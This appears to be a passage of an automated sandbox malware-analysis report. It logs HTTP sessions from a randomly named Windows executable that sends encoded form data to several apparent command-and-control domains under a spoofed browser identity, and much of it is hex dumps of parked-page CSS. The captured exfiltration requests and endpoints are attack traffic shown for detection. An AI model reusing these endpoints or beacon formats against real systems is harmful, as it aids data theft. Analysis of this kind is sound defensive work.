                                                                                                                                                            Nov 12, 2024 18:36:14.833769083 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 35 34 30 70 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69
                                                                                                                                                            Data Ascii: max-width: 540px } } @media (min-width:768px) { .container, .container-md, .container-sm { max-width: 720px
                                                                                                                                                            Nov 12, 2024 18:36:14.834657907 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 39 30 70 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .container { max-width: 1190px } } @media (min-width:1560px) { .container { max-width: 1480px } }
                                                                                                                                                            Nov 12, 2024 18:36:14.834673882 CET1236INData Raw: 33 33 33 33 33 33 33 33 25 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a
                                                                                                                                                            Data Ascii: 33333333% } .col-sm-2 { flex: 0 0 auto; width: 16.66666667% } .col-sm-3 { flex: 0 0 auto; width:
                                                                                                                                                            Nov 12, 2024 18:36:14.834686041 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 31 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .col-sm-12 { flex: 0 0 auto; width: 100% } .offset-sm-0 { margin-left: 0 } } @media (min-width:
                                                                                                                                                            Nov 12, 2024 18:36:14.835717916 CET1236INData Raw: 38 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 36 2e 36 36 36 36 36 36 36 37 25 0a 20 20
                                                                                                                                                            Data Ascii: 8 { flex: 0 0 auto; width: 66.66666667% } .col-md-9 { flex: 0 0 auto; width: 75% } .col-md-10 {
                                                                                                                                                            Nov 12, 2024 18:36:14.838603973 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 6c 67 2d 35 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74
                                                                                                                                                            Data Ascii: .col-lg-5 { flex: 0 0 auto; width: 41.66666667% } .col-lg-6 { flex: 0 0 auto; width: 50% }


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            36192.168.2.85001552.20.84.62806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:16.703464031 CET534OUTGET /esft/?mnYxMt=mVI2MUxphHC6Uw3exRyeaSUO625HWiZjnHyqF3bL23emPksaKYEAojmfDw0HEL3vY5GLDWVdtCqn7MAr+1mql2O8Aqc8K+kCLQXJA3QmiA5LkgCXPGJmunOEg2Q+Wwqggw==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:36:17.394593954 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:17 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f77ff-cbab"
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 61 74 6f 6d 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 74 6f 6d 2e 63 6f 6d 20 2d 20 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 65 64 20 61 20 62 72 61 6e 64 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:36:17.394747019 CET212INData Raw: 20 20 20 20 20 20 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: ::before { box-sizing: border-box } @media (prefers-reduced-motion:no-preference) { :root { scroll-behavior: smooth
                                                                                                                                                            Nov 12, 2024 18:36:17.394757986 CET1236INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 33 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: } } body { min-width: 330px; font-size: 16px; color: #212529; line-height: 1.5; margin: 0; font-weight: 400;
                                                                                                                                                            Nov 12, 2024 18:36:17.395087957 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20
                                                                                                                                                            Data Ascii: font-weight: 500; line-height: 1.2 } .h1, h1 { font-size: calc(1.375rem + 1.5vw) } @media (min-width:1200px) { .h1,
                                                                                                                                                            Nov 12, 2024 18:36:17.395100117 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69
                                                                                                                                                            Data Ascii: } p { margin-top: 0; margin-bottom: 1rem } ol, ul { padding-left: 2rem } dl, ol, ul {
                                                                                                                                                            Nov 12, 2024 18:36:17.395112991 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 75 74 74 6f 6e 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                            Data Ascii: line-height: inherit } button, select { text-transform: none } [role=button] { cursor: pointer } select {
                                                                                                                                                            Nov 12, 2024 18:36:17.395982981 CET848INData Raw: 61 78 2d 77 69 64 74 68 3a 20 37 32 30 70 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32
                                                                                                                                                            Data Ascii: ax-width: 720px } } @media (min-width:992px) { .container, .container-lg, .container-md, .container-sm { max-width: 9
                                                                                                                                                            Nov 12, 2024 18:36:17.395994902 CET1236INData Raw: 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 35 36 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: @media (min-width:1560px) { .container { max-width: 1480px } } @media (min-width:1400px) { .container { max-width: 1190px
                                                                                                                                                            Nov 12, 2024 18:36:17.396004915 CET212INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a
                                                                                                                                                            Data Ascii: flex: 0 0 auto; width: auto } .col-sm-1 { flex: 0 0 auto; width: 8.33333333% }
                                                                                                                                                            Nov 12, 2024 18:36:17.396015882 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68
                                                                                                                                                            Data Ascii: .col-sm-2 { flex: 0 0 auto; width: 16.66666667% } .col-sm-3 { flex: 0 0 auto; width: 25% }
                                                                                                                                                            Nov 12, 2024 18:36:17.399931908 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                                                            Data Ascii: flex: 0 0 auto; width: 100% } .offset-sm-0 { margin-left: 0 } } @media (min-width:768px) { .col-md-aut


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            37192.168.2.8537513.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:23.742079020 CET809OUTPOST /frw6/ HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.digitalbloom.info
                                                                                                                                                            Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4c 62 58 39 6c 6d 39 6f 38 76 44 4f 44 77 41 61 44 62 64 55 39 63 50 30 73 33 54 78 53 79 64 34 42 42 58 49 52 74 47 37 39 59 78 62 4d 6a 58 65 53 64 2b 49 79 49 38 69 32 65 36 6f 6d 68 43 45 36 55 71 66 76 77 5a 75 70 41 53 58 39 79 42 33 71 4f 48 2b 72 61 44 6d 54 4a 53 57 74 73 46 45 76 55 52 4a 59 2b 4a 7a 6a 59 38 53 37 65 35 7a 72 42 76 77 47 61 6c 72 56 48 33 72 68 7a 58 41 53 6f 6f 72 69 68 45 4c 73 70 47 47 4a 75 39 44 67 37 6e 67 64 6e 32 54 4b 5a 63 63 57 54 4a 47 57 37 4c 35 2f 33 50 35 6e 2b 67 71 54 43 66 37 51 6e 71 74 70 46 45 67 52 32 73 3d
                                                                                                                                                            Data Ascii: mnYxMt=ZEfNzSM6YnFyLbX9lm9o8vDODwAaDbdU9cP0s3TxSyd4BBXIRtG79YxbMjXeSd+IyI8i2e6omhCE6UqfvwZupASX9yB3qOH+raDmTJSWtsFEvURJY+JzjY8S7e5zrBvwGalrVH3rhzXASoorihELspGGJu9Dg7ngdn2TKZccWTJGW7L5/3P5n+gqTCf7QnqtpFEgR2s=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            38192.168.2.8537523.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:26.288425922 CET829OUTPOST /frw6/ HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.digitalbloom.info
                                                                                                                                                            Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4b 34 50 39 70 6c 6c 6f 72 2f 44 52 4d 51 41 61 4a 37 63 66 39 63 44 30 73 32 57 71 53 6b 31 34 50 45 72 49 44 76 2b 37 6f 59 78 62 45 44 58 62 4d 74 2b 50 79 49 77 71 32 63 75 6f 6d 68 47 45 36 56 61 66 76 44 42 74 72 51 53 76 68 79 41 78 33 2b 48 2b 72 61 44 6d 54 4e 36 34 74 73 74 45 73 6b 42 4a 5a 66 4a 79 70 34 38 52 7a 2b 35 7a 38 78 76 30 47 61 6b 62 56 44 2b 77 68 78 66 41 53 74 4d 72 69 77 45 4d 35 5a 47 41 55 2b 38 38 68 34 61 76 44 51 4f 78 4f 36 30 2b 5a 43 5a 39 58 4e 6d 54 6c 56 48 2f 6b 2b 49 42 54 42 33 4e 56 51 33 46 7a 6d 55 51 50 68 35 71 62 31 6a 70 46 56 58 54 77 34 4c 41 49 79 6e 65 71 32 44 42
                                                                                                                                                            Data Ascii: mnYxMt=ZEfNzSM6YnFyK4P9pllor/DRMQAaJ7cf9cD0s2WqSk14PErIDv+7oYxbEDXbMt+PyIwq2cuomhGE6VafvDBtrQSvhyAx3+H+raDmTN64tstEskBJZfJyp48Rz+5z8xv0GakbVD+whxfAStMriwEM5ZGAU+88h4avDQOxO60+ZCZ9XNmTlVH/k+IBTB3NVQ3FzmUQPh5qb1jpFVXTw4LAIyneq2DB


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            39192.168.2.8537533.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:28.833564043 CET1846OUTPOST /frw6/ HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.digitalbloom.info
                                                                                                                                                            Referer: http://www.digitalbloom.info/frw6/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4b 34 50 39 70 6c 6c 6f 72 2f 44 52 4d 51 41 61 4a 37 63 66 39 63 44 30 73 32 57 71 53 6b 39 34 50 32 54 49 52 4f 2b 37 75 6f 78 62 62 7a 58 61 4d 74 2b 53 79 49 6f 75 32 63 69 43 6d 6e 61 45 36 33 53 66 70 32 31 74 68 51 53 76 35 79 41 68 71 4f 47 6d 72 5a 72 36 54 4a 57 34 74 73 74 45 73 69 39 4a 50 2b 4a 79 6d 59 38 53 37 65 35 30 72 42 76 4d 47 62 4e 6a 56 44 36 67 6d 41 2f 41 63 74 63 72 6c 47 77 4d 37 35 47 43 58 2b 38 6b 68 34 58 76 44 51 36 58 4f 37 41 45 5a 45 70 39 57 73 62 2f 39 45 44 6d 36 66 4d 50 53 67 71 72 62 68 43 70 78 33 6f 45 4a 57 4e 52 62 7a 33 59 54 57 48 46 36 37 65 5a 54 54 62 4a 76 7a 6d 30 4d 67 56 59 4c 65 75 62 4c 73 6a 65 68 59 38 58 30 4c 4a 62 55 37 4c 41 6e 2f 59 56 33 67 61 78 42 30 49 65 62 5a 51 4a 38 65 55 54 4f 63 4b 71 79 2f 7a 41 35 58 56 75 43 7a 54 68 4f 2b 44 64 63 33 59 6b 35 65 38 67 50 62 73 32 43 52 55 71 2b 36 6c 6f 6a 65 63 31 4d 5a 4a 64 6a 53 59 51 32 66 62 41 45 73 35 52 54 2b 4e 75 38 61 41 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=ZEfNzSM6YnFyK4P9pllor/DRMQAaJ7cf9cD0s2WqSk94P2TIRO+7uoxbbzXaMt+SyIou2ciCmnaE63Sfp21thQSv5yAhqOGmrZr6TJW4tstEsi9JP+JymY8S7e50rBvMGbNjVD6gmA/ActcrlGwM75GCX+8kh4XvDQ6XO7AEZEp9Wsb/9EDm6fMPSgqrbhCpx3oEJWNRbz3YTWHF67eZTTbJvzm0MgVYLeubLsjehY8X0LJbU7LAn/YV3gaxB0IebZQJ8eUTOcKqy/zA5XVuCzThO+Ddc3Yk5e8gPbs2CRUq+6lojec1MZJdjSYQ2fbAEs5RT+Nu8aAbQzDgDxBP99Z5LnmwRokImpPCPs3r2HTJpvQM9pg/HLYcWZXx/2kzLymqT9nxqYikqJlTFfykcKzwsEcNtVl+FRqGrL8y2u5Atj8JaCvM7H6gcOrq2YnQB6GbU5KeDZ4NFVcjHTomV/PDx2sxeEYXfxrvwQt/m6W1xzf3JQRZnxs3GnH7wgIgLcCr3krD6tVKjK8fg6sI4Q2PSQPekXAmEgUAqCXnr7MSsO9+JtYlgLOBNHS9XZaKkEW7/pwp67G3miCMKKAkpFYZzMmIZ3vvdM6SUP5lNC7HhaVghfhFi3r145jAVkIAzlFZy4UNAe0cR0kLmv2ATYlp+KleLxhjj/fcT4znL8kBguZPVsL72f8VFfE9ftjzU2xRHAAuD1+0oGF+SrxSNlM6x75YRKbM9196xfyVMZuK/34q6Uc5uNm/F2k/nOOPj0bEqnp+Jb4c5CTRUlZn+oFjHm15MxcjSr1lDXdR/JiZxGzJJ9807sCyulMhOxpFsSU/B44fbfnuLyahRDyXEoq8b8qWAQ7cQ+j0UKWnMBNahhNhuGfuyk15sDDWypJN3eZbVvJRR1FNESvlKzl3J5Eqs6z2X6+B2Pj/4/EzxOp4omPHMHHLYclxpTHJEiBjX3KtRRa2CNGyjYqqm6ywsHqfSMMB/FXtv89ll2ShPRocu [TRUNCATED]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            40192.168.2.8537543.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:31.387521029 CET542OUTGET /frw6/?mnYxMt=UG3twl1RTWICP6a/gHNO8KHNMAUFMYd04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRyja311ZOzbuI/6XNArj8rsZzk05Ib+oXtNARvJ557jq8EQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.digitalbloom.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:36:32.030256987 CET410INHTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:31 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 6e 59 78 4d 74 3d 55 47 33 74 77 6c 31 52 54 57 49 43 50 36 61 2f 67 48 4e 4f 38 4b 48 4e 4d 41 55 46 4d 59 64 30 34 74 66 39 6a 6b 32 7a 4a 7a 52 45 4c 31 48 46 45 66 65 4d 33 64 68 65 47 68 58 76 5a 4a 61 32 78 65 6b 6c 67 4a 57 36 6e 79 79 35 39 48 2b 46 70 78 4e 52 79 6a 61 33 31 31 5a 4f 7a 62 75 49 2f 36 58 4e 41 72 6a 38 72 73 5a 7a 6b 30 35 49 62 2b 6f 58 74 4e 41 52 76 4a 35 35 37 6a 71 38 45 51 3d 3d 26 54 54 64 3d 79 52 4e 50 5a 42 55 38 66 5a 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=UG3twl1RTWICP6a/gHNO8KHNMAUFMYd04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRyja311ZOzbuI/6XNArj8rsZzk05Ib+oXtNARvJ557jq8EQ==&TTd=yRNPZBU8fZA"}</script></head></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            41192.168.2.853755142.250.185.179806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:37.348830938 CET809OUTPOST /5ab9/ HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.amitayush.digital
                                                                                                                                                            Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 77 78 7a 75 77 73 58 52 6b 59 53 70 54 52 68 6c 6a 33 59 44 31 44 6e 4a 4c 4b 6d 57 32 4d 52 35 71 50 79 67 34 46 35 78 70 32 52 6a 78 41 6f 68 68 6d 57 36 58 4e 48 58 34 71 77 6e 61 52 76 30 4d 62 65 55 77 54 70 39 63 4f 66 72 34 67 42 35 62 78 39 58 68 72 72 65 79 50 77 55 56 57 2f 4d 77 7a 48 41 73 75 30 53 79 7a 55 49 78 68 33 52 4e 56 2b 41 30 33 62 49 67 78 53 32 67 59 30 6a 76 4b 39 4d 74 77 72 65 70 4c 4c 30 50 48 6c 6f 2b 39 64 6b 51 36 61 70 59 6b 5a 46 76 63 48 31 71 6c 76 61 2b 61 4f 65 65 62 47 6b 48 33 61 77 2b 2b 30 75 5a 34 53 74 56 54 51 3d
                                                                                                                                                            Data Ascii: mnYxMt=cI34pYOAGglcwxzuwsXRkYSpTRhlj3YD1DnJLKmW2MR5qPyg4F5xp2RjxAohhmW6XNHX4qwnaRv0MbeUwTp9cOfr4gB5bx9XhrreyPwUVW/MwzHAsu0SyzUIxh3RNV+A03bIgxS2gY0jvK9MtwrepLL0PHlo+9dkQ6apYkZFvcH1qlva+aOeebGkH3aw++0uZ4StVTQ=
                                                                                                                                                            Nov 12, 2024 18:36:38.279871941 CET407INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
